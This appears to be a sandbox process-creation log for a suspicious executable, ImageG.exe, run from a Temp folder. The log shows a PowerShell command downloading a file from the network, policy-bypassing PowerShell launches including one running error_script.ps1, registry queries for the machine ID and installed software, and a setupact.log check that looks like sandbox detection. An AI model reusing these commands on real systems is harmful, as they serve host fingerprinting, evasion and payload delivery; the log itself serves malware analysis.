        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe "C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\desenamoreis" --mojo-platform-channel-handle=2424 --field-trial-handle=1704,i,16015974932036603911,12011319821735698167,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HomeBusiness2019Retail - en-us""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HomeBusiness2019Retail - en-us"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 91.0.1 (x64 en-GB)""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 91.0.1 (x64 en-GB)"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
